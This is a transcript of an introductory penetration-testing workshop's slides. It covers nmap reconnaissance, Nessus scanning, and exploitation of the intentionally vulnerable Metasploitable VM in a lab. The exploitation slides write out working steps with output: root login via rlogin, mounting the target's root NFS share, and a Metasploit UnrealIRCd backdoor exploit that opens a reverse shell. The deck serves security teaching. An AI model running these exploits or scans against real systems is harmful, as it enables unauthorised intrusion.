Pentesting · 2018-07-19 · Pentesting –How is it usually done •Intelligence/ Information...
55
Pentesting An Introduction
Transcript of Pentesting · 2018-07-19 · Pentesting –How is it usually done •Intelligence/ Information...
PentestingAn Introduction
Workshop Flow – 1
• Nature of Cyber Security Problem (Slides 4-7)
• Introduction – Pentesting - what, why, how (8-9)
• Pentesting - Intelligence Gathering (10-11)
• Pentesting tools Demo– Kali Linux, NMAP (12)
• Intelligence Gathering using WhoIS (13-15)
• Metasploitable OS – An Introduction (16)
• Pentest Lab 1.1 - Setup Vmware/ Virtual Box, Kali Linux VM, Metasploitable VM, Familiarity with Kali Linux, WhoIs
• Intelligence Gathering using NMAP (18-36)• Host Discovery• Port Scanning• OS Detection• Services and Version Detection
• Pentest Lab 1.2 – Intelligence Gathering with NMAP
Workshop Flow - 2
• Vulnerability Analysis (38-39)
• Scanning with Nessus (40-42)
• Understanding Nessus Vulnerability Report (43)
• Understand Vulnerabilties, where do they arise from? (44)
• Exploiting Vulnerabilities – Metasploit and Tools (45-54)• Rlogin• NFS-Share• Metasploit
• Approach to security --- Threat Modelling (55)
• Pentest Lab 1.3• Scanning with Nessus, Analysing the Report• Exploit Vulnerability1, Tools• Exploit Vulnerability2, Tools• Exploit Vulnerability3,4 using Metasploit
Black Hat – White Hat (A Game)
• Securing Our Home – A perspective
Security is Game of Survival
To Survive Deer should run faster than Tiger
To Survive Tiger should run faster than Deer
Physical Security vs Cyber Security
• How similar/ different• Intent
• Nature of the problem• Internet, Global boundaries, Glorified hackers,
Attack tools, Standards, Underworld economy, Accountability, Who is the adversary
• Strategy (attack and defense)• Weakest link strategy, All bases covered
strategy, Insider attack, Policies at different levels etc.
• Are they separate any more?
Spyware
Financial Malware
Security Problem Solving• Security : a Negative Goal.
• Achieve something despite whatever adversary might do. • Positive goal: “Ram can read grades.txt".
• Ask Ram to check that it works. Easy to check • Negative goal: “Shyam cannot read grades.txt".
• Check if Shyam cannot read grades.txt? Good to check, but not nearly enough. Must reason about all possible ways in which Shyam might get the data.
• How might Shyam try to get the contents of grades.txt? Change permissions ,Steal file, Impersonate etc.
• Open Ended Problem. No absolute definitive answer
• Threat Model Concept & Problem Solving
Pentesting – What, Why, How
• Pentesting : An Attack on a system in hopes of finding security weaknesses
• Rationale : Improving the security of your site by breaking into it
• How : Using Attacker’s Techniques
Pentesting – How is it usually done
• Intelligence/ Information Gathering
• Information Analysis and Planning – Component relationships, Target
identification etc
• Vulnerability Detection
• Penetration – Developing/ Customising, Choosing Exploit tools
• Attack/Privilege Escalation
• Analysis and reporting
• Clean-up
Intelligence Gathering
• What are we looking for?• Organizational intelligence, Access point discovery, Network discovery, Infrastructure
fingerprinting
• Open Source Intelligence• Corporate Information :: Location, Org Chart, Document Metadata, Network, Email
Address, Applications used, Purchase Agreements, Defense Technologies Used (Fingerprinting), Financial Information etc
• Individual Information :: All about individual, Social Engineering
• Covert Intelligence : Through Individuals
• Footprinting (next slide)
• Identify Protection Systems (Network, Host, Application, Storage etc)
Intelligence Gathering - Footprinting
• Passive Reconnaisance : Who is lookup, BGP Looking glasses
• Active Footpriting : Port Scanning, Banner Grabbing, SNMP sweeps, DNS Discovery, Forward/ Reverse DNS, Web Application Discovery, Virtual Host Detection
• Establish Target List : Versions, Weak web applications, Patch level
Kali Linux - Demo
A Collection of all Cyber Security related tools
Tools for Information Collection
Some info gathering tools
Some Possible Recon-ng/ Harvester, Maltego, NMAP, Burpsuite, Nessus/ Acunetix
Footprint - First Data
• IP ADDress ( some Ip address in the network to start with )…hunting IP Address
• whois a normally goodplace to start…maltego???...emailID, headers
Whois lookup
• Install it on your linux distro by entering apt-get install whois in terminal
• https://registry.in/whois/nita.ac.in
• Domain Name: NITA.AC.INRegistry Domain ID: D3544155-AFINRegistrar WHOIS Server:Registrar URL: http://www.ernet.inUpdated Date: 2017-03-02T07:21:44ZCreation Date: 2009-04-06T05:03:46ZRegistry Expiry Date: 2019-04-06T05:03:46ZRegistrar Registration Expiration Date:Registrar: ERNET IndiaRegistrar IANA ID: 800068Registrar Abuse Contact Email:Registrar Abuse Contact Phone:Reseller:Domain Status: okRegistrant Organization: National Institute of Technology, AgartalaRegistrant State/Province:Registrant Country: INName Server: ns1.nkn.inName Server: ns2.nkn.inDNSSEC: unsignedURL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/>>> Last update of WHOIS database: 2018-06-25T15:58:44Z
Whois lookup
• root@kali:~# ping ns1.nkn.inPING ns1.nkn.in (180.149.63.3) 56(84) bytes of data.
64 bytes from ns1.nkn.in (180.149.63.3): icmp_seq=1 ttl=56 time=40.3 ms
64 bytes from ns1.nkn.in (180.149.63.3): icmp_seq=2 ttl=56 time=45.0 ms
64 bytes from ns1.nkn.in (180.149.63.3): icmp_seq=3 ttl=56 time=46.1 ms
64 bytes from ns1.nkn.in (180.149.63.3): icmp_seq=4 ttl=56 time=45.3 ms
64 bytes from ns1.nkn.in (180.149.63.3): icmp_seq=5 ttl=56 time=44.5 ms
--- ns1.nkn.in ping statistics ---
5 packets transmitted, 5 received, 0% packet loss, time 7715ms
rtt min/avg/max/mdev = 40.333/44.292/46.140/2.048 ms
Metasploitable - Introduction
• An intentionally vulnerable Ubuntu Linux virtual machine that is designed for testing common vulnerabilities.
• Used for Labs to exploit
• This virtual machine is compatible with VMWare, VirtualBox, and other common virtualization platforms.
• Created by the Rapid7 Metasploit team
• Metasploitable login is “msfadmin”; the password is also “msfadmin”
Lab 1.1
• Lab Setup• Virtual Box/ Vmware
• Kali Linux, Metasploitable
• Kali Linux Tools
• Metasploitable
• Testing communication between Kali Linux, Metasploitable server
• Whois
NMAP
• nmap is an open-source port/security scanner
• It’s primary function is the discovery and mapping of hosts on a network
• nmap is consistently voted as one of the most used security tools
• Needs as input a range or some specific address……..
NMAP
• Host Discovery – Identifying computers on a network
• Port Scanning – Enumerating the open ports on one or more target computers
• Version Detection – Interrogating listening network services • listening on remote computers to determine the application name and
version number
• OS Detection – Remotely determining the operating system from network devices
NMAP Demo (Script)
Run nmap command on Kali Linux Terminal.
Sample Syntax:
nmap [ <Scan Type> ...] [ <Options> ] { <target specification> }
TARGET SPECIFICATION:
Can pass hostnames, IP addresses, networks, etc.
Ex: scanme.nmap.org, microsoft.com/24, 192.168.0.1; 10.0.0-255.1-254
-iL <inputfilename>: Input from list of hosts/networks
-iR <num hosts>: Choose random targets
--exclude <host1[,host2][,host3],...>: Exclude hosts/networks
--excludefile <exclude_file>: Exclude list from file
Nmap –v –A <ip address>…look at the report nmap_report_1.txt in kali linux reports folder
NMAP Host Discovery
• Querying multiple hosts using this method is referred to as ping sweeps …sweep through a range of IP addresses
• The most basic step in mapping out a network.
• Several Sweeps technique• ARP Sweep (default)• ICMP Sweeps• Broadcast ICMP• NON Echo ICMP• TCP sweep• UDP sweep
Host Discovery : ARP Sweep “nmap 10.0.2.0/24 –sn “
Host Discovery : ICMP Sweeps• Used by nmap when router in between (WAN)
• Technique• sending an ICMP ECHO request (ICMP type 8)• If an ICMP ECHO reply (ICMP type 0) is received : target is alive; • No response: target is down
• Pros & Cons• easy to implement• fairly slow, easy to be blocked
Scanner Target
ICMP ECHO request
ICMO ECHO reply
Scanner Target
a host is alive
a host is down/filtered
ICMP ECHO request
No response
Host Discovery : TCP Sweeps
• Sending TCP ACK or TCK SYN packets
• The port number can be selected to avoid blocking by firewall• Usually a good pick would be 21 / 22 / 23 / 25 / 80
• But.. firewalls can spoof a RESET packet for an IP address, so TCP Sweeps may not be reliable.
Host Discovery : UDP Sweeps
• Relies on the ICMP PORT UNREACHABLE
• Assume the port is opened if no ICMP PORT UNREACHABLE message is received after sending a UDP datagram
• Cons:• Routers can drop UDP packets as they cross the Internet
• Many UDP services do not respond when correctly probed
• Firewalls are usually configured to drop UDP packets (except for DNS)
• UDP sweep relies on the fact that a non-active UDP port will respond with an ICMP PORT UNREACHABLE message
NMAP Host Discovery summary• sL: List Scan - simply list targets to scan• -sn: Ping Scan - go no further than determining if host is online• -PN: Treat all hosts as online -- skip host discovery
• -PS/PA/PU [portlist]: TCP SYN/ACK or UDP discovery to given ports• -PE/PP/PM: ICMP echo, timestamp, and netmask request discovery probes• -PO [protocol list]: IP Protocol Ping
• -n/-R: Never do DNS resolution/Always resolve [default: sometimes]• --dns-servers <serv1[,serv2],...>: Specify custom DNS servers• --system-dns: Use OS's DNS resolver
• -sU: UDP ScanDemo and look at wireshark captureroot@kali:~# nmap -sn 10.0.2.4
Starting Nmap 7.70 ( https://nmap.org ) at 2018-06-26 05:36 EDTNmap scan report for 10.0.2.4Host is up (0.00026s latency).
MAC Address: 08:00:27:1A:23:D5 (Oracle VirtualBox virtual NIC)Nmap done: 1 IP address (1 host up) scanned in 0.13 seconds
Port Scanning : TCP Connect Scan• Use basic TCP connection establishment mechanism; complete 3-ways handshake
• Easily to detect by inspecting the system log
• Normally not used since expensive
Scanner Target
SYN
SYN/ACK
ACK
Scanner Target
SYN
RST/ACK
a port is opened
a port is closed
Port Scanning : TCP SYN scan• Do not establish a complete connection (Half Open scanning)
• send a SYN packet and wait for a response• If an SYN/ACK is received=> the port is LISTENING
• immediately tear down the connection by sending a RESET
• If an RST/ACK is received =>a non-LISTENING port. nmap –Pn <ip address> is Syn scan for all ports
Scanner Target
SYN
SYN/ACK
Scanner Target
SYN
RST/ACK
a port is closed
a port is opened
RST
Port Scanning : Stealth Scan• To gather information about target sites while avoiding
detection • Try to hide themselves among normal network traffic• Not to be logged by logging mechanism (stealth)
• Techniques• Flag Probe packets (Also called “Inverse mapping”)
• Response is sent back only by closed port• By determining what services do not exist, an intruder can infer what
service do exist
• Slow scans rate• difficult to detect =>need long history log
CERT reported this technique in CERT® Incident Note IN-98.04
http://www.cert.org/incident_notes/IN-98.04.html
Port Scanning : Stealth Mapping
• RFC793: to handle wrong state packets
• closed ports : reply with a RESET packet to wrong state packets
• opened ports : ignore any packet in question
• Technique
• A RST scan
• A FIN probe with the FIN TCP flag set (eg nmap –sF –p25 <IP address> and capture)
• An XMAS probe with : set FIN, URG, ACK, SYN, RST, PUSH flags set (eg nmap –sX –p27 <ip address and capture)
• A NULL probe with no TCP flags set
Scanner Target
Probe packet
No response
Scanner Target
RST/ACK
a port is closed
a port is opened
Probe packet
Port Scanning with nmap• SCAN TECHNIQUES:
• -sS/sT/sA/sW/sM: TCP SYN/Connect()/ACK/Window/Maimon scans• -sN/sF/sX: TCP Null, FIN, and Xmas scans• -b <FTP relay host>: FTP bounce scan
• PORT SPECIFICATION AND SCAN ORDER:• -p <port ranges>: Only scan specified ports
• Ex: -p22; -p1-65535; -p U:53,111,137,T:21-25,80,139,8080• -F: Fast mode - Scan fewer ports than the default scan• -r: Scan ports consecutively - don't randomize• --top-ports <number>: Scan <number> most common ports• --port-ratio <ratio>: Scan ports more common than <ratio>
Demo : Look at wire shark capture of nmap –sP x.x.x.x ( uses syn scan colorized conversations)nmap -Pn 10.0.2.4Starting Nmap 7.70 ( https://nmap.org ) at 2018-06-26 05:14 EDTNmap scan report for 10.0.2.4Host is up (0.00037s latency).Not shown: 977 closed portsPORT STATE SERVICE21/tcp open ftp22/tcp open ssh23/tcp open telnet
Services and Versions Detection
• The nmap-service-probes database contains probes for querying various services and match expressions to recognize and parse responses
Operating System Detection
• Banner, DNS HINFO and …
• TCP/IP fingerprinting (IP stack implementation will response differently)• FIN probe, Bogus Flag probe
• TCP initial sequence number sampling, TCP initial window, ACK value
• ICMP error quenching, message quoting, ICMP echo integrity
• IP: DF, TOS, Fragmentation
OS Detection : Examples
• ACK : sending FIN|PSH|URG to a closed port• most OS : ACK with the same sequence number
• Windows: ACK with sequence number+1
• Type of Service: Probing with an ICMP_PORT_UNREACHABLE message
• most OS : TOS = 0
• Linux : TOS= 0xC0
Version and OS Detection with nmap
• SERVICE/VERSION DETECTION:• -sV: Probe open ports to determine service/version info
• --version-intensity <level>: Set from 0 (light) to 9 (try all probes)
• --version-light: Limit to most likely probes (intensity 2)
• --version-all: Try every single probe (intensity 9)
• --version-trace: Show detailed version scan activity (for debugging)
• OS DETECTION:-O: Enable OS detection--osscan-limit: Limit OS detection to promising targets--osscan-guess: Guess OS more aggressively
Demo -sV and wireshark capture
root@kali:~# nmap -sV 10.0.2.4
Starting Nmap 7.70 ( https://nmap.org ) at 2018-06-26 06:01 EDT
Nmap scan report for 10.0.2.4
Host is up (0.00010s latency).
Not shown: 977 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
Lab 1.2
• Workshop Lab Document
Vulnerabilties
• According to Wikipedia;
“The word vulnerability, in computer security, refers to a weakness in a systemallowing an attacker to violate the confidentiality, integrity, availability, access control,consistency or audit mechanisms of the system or the data and applications it hosts”
• To Software Developers, a bug is synonymous to a vulnerability.• Ex: Errors in program’s source code or flawed program design
• Buffer overflows• Memory leaks• Dead locks• Arithmetic overflow• Accessing protected memory (Access Violation)
• Software bug we are speaking of, they are used as the foundation to form an exploit.SecurityAttack on Vulnerability is exploit.
Vulnerabilities
Using Nmap or any scanner Find any hosts worthwhile? Next step should be scanning for exploitable vulnerabilities.
What could be the approach?
• What data do we have till now?
Hosts, Open Ports, Operating System, Applications Running, Versions
• How could we use this data? Use this data to find vulnerabilities using various resources on the net (exploit DB, CVE database, other databases)
Or
• Use a Vulnerability Scanner
Vulnerability Scanner - Nessus
• Nessus is a proprietary vulnerability scanner with Home version free
• Nessus runs a set of exploits on the open ports and reports vulnerabilities
• Vulnerability checks are implemented through plugins. • Plugins are written in Nessus Attack Scripting Language (NASL), a
scripting language optimized for custom network interaction. • New plugins are added as vulnerabilities are discovered. • Many plugins check for a vulnerability by actually exploiting the
vulnerability.• The ‘safe checks’ option specifies that no vulnerability check capable of
crashing a remote host be used (such as DOS attacks).• DEMO…look at Basic scan and Plugins
Vulnerability Scanner - Nessus
• Download Nessus
• On Kali Linux terminal run /etc/init.d/nessusd start
Will get Starting Nessus….
• Go to https://127.0.0.1:8834/#/
Vulnerabilties
Now we know the Vulnerabilities
What’s out Goal with this knowledge?
- Understand where Vulnerabilities arise from (to Prevent in future)
- Understand how exploitations happen (to be able write signatures/ exploit detection)
Understand the vulnerability, categories/ families? (Nessus Families?)
Find a tool to Exploit/ Write an exploit
Metasploit – Rapid7…Demo
Vulnerability – Rlogin ExploitIf we look at Family vertical of Nessus Report, we see some simple ones
- Backdoor
- Gain a shell remotely
- Service Detection – Existence of the service itself indicates vulnerability. Let’s try to exploit “rlogin service detection”
- Click on rlogin Service Detection in nessus report to get details
On Kali Linux Install rsh-client (for rlogin command else it defaults to ssh)
apt-get install rsh-client
rlogin -l root 10.0.2.4Last login: Thu Jun 28 07:28:57 EDT 2018 from :0.0 on pts/0
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686
Snip….Snip
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
You have new mail.
root@metasploitable:~#
Vulnerability – NFS Share Exploit
- Let’s try to exploit “nfs exported share information disclosure”- Click on the same in nessus report to get detailsOn Kali Linux Install rpcbind only if you want to recheck if nfs is running), nfs-common
apt-get install rpcbind
apt-get install nfs-common
root@kali:~# showmount -e 10.0.2.4
Export list for 10.0.2.4:
/ *
root@kali:~# mkdir /tmp/r00t
root@kali:~# mount -t nfs 10.0.2.4:/ /tmp/r00t/
root@kali:~# ls
amit_passwd Documents Music Pictures Templates Videos
Desktop Downloads 'nmap scan reports' Public trojan.exe
Vulnerabilties – Exploit Payload
• Exploits are commonly used to install system malware or gain system access or recruit client machines into an existing ‘botnet’.
• This is accomplished with the help of a payload
• The payload is a sequence of code that is executed when the vulnerability is triggered
• To make things clear, an Exploit is really broken up into two parts, like so;
EXPLOIT = Vulnerability + Payload;
• Different payload types exist and they accomplish different tasks• exec → Execute a command or program on the remote system• download_exec→ Download a file from a URL and execute• upload_exec→ Upload a local file and execute• adduser → Add user to system accounts
Metasploit Framework
What is the Metasploit Framework?
• According to the Metasploit Team;
“The Metasploit Framework is a platform for writing, testing, and using
exploit code. The primary users of the Framework are professionals
performing penetration testing, shellcode development, and
vulnerability research.”
Metasploit Framework
• The MSF is not only an environment for exploit development but also a platform for launching exploits on real-world applications. It is packaged with real exploits that can provide real damage if not used professionally.
• The fact that MSF is an open-source tool and provides such a simplified method for launching dangerous attacks, it has and still is attracting blackhat and whitehat beginners. Fairly dangerous.
Vulnerabilties –Exploits using Metasploit
db_nmap -v -T4 -PA -sV --version-all --osscan-guess -A -sS -p 1-65535 <ip address>
Scans Metsploitable
Vulnerabilties –Exploits using Metasploit
• run the following command:
Services
• Compare
With Nessus
Report
Vulnerabilties –Exploits using Metasploit
Usually the sequence for exploiting is
- Search for the Exploit/ payload using command “search xxx”. Search can be on multiple keywords related to vulnerability eg CVE, module etc
- “use <Exploit>”
- “Info” to get information on the Exploit
- “run” to execute the exploit
Vulnerabilties – UnrealIRCd Backdoor Detection
- Click on UnrealIRCd Backdoor Detection in Nessus Report
Provides information including CVE No ‘ CVE-2010-2075’
- In Metasploit ‘Search CVE-2010-2075’ givesmsf exploit(unix/irc/unreal_ircd_3281_backdoor) > search cve-2010-2075
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
exploit/unix/irc/unreal_ircd_3281_backdoor 2010-06-12 excellent UnrealIRCD 3.2.8.1 Backdoor Command Execution
- ‘Use exploit/unix/irc/unreal_ircd_3281_backdoor ‘ gives cursurmsf exploit(unix/irc/unreal_ircd_3281_backdoor) >
- ‘info’ provides information of payload. RHOST is not set
Vulnerabilties – UnrealIRCd Backdoor Detection
msf exploit(unix/irc/unreal_ircd_3281_backdoor) > set RHOST 10.0.2.4
RHOST => 10.0.2.4
msf exploit(unix/irc/unreal_ircd_3281_backdoor) > run
[*] Started reverse TCP double handler on 10.0.2.15:4444
[*] 10.0.2.4:6667 - Connected to 10.0.2.4:6667...
:irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...
:irc.Metasploitable.LAN NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead
[*] 10.0.2.4:6667 - Sending backdoor command...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo NkKbs49F8lfv25Hf;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "NkKbs49F8lfv25Hf\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (10.0.2.15:4444 -> 10.0.2.4:60006) at 2018-06-28 12:20:03 -0400
<<<<<<<<<<<<<<<<<<<<<<<Type commands>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>.
Security Approach – Threat Modeling
Structured approach to identifying, quantifying, and addressing threats.
In threat modeling, we cover the three main elements:
• Assets: What valuable data and equipment should be secured?
• Threats: What may an attacker do to the system?
• Vulnerabilities: What flaws in the system allow an attacker to realize a threat?
Possible Steps to Threat Modeling
• Identify the Assets
• Describe the Architecture Describe the Architecture
• Break down the Applications
• Identify the Threats
• Document and Classify the Threats
• Rate the Threats
Lab 1.3
Nessus Scan – Metasploitable
Look at Vulnerabilities
2 Vulnerabilities without Metasploit
Metasploit Commands
2 Vulnerabilities with Metasploit
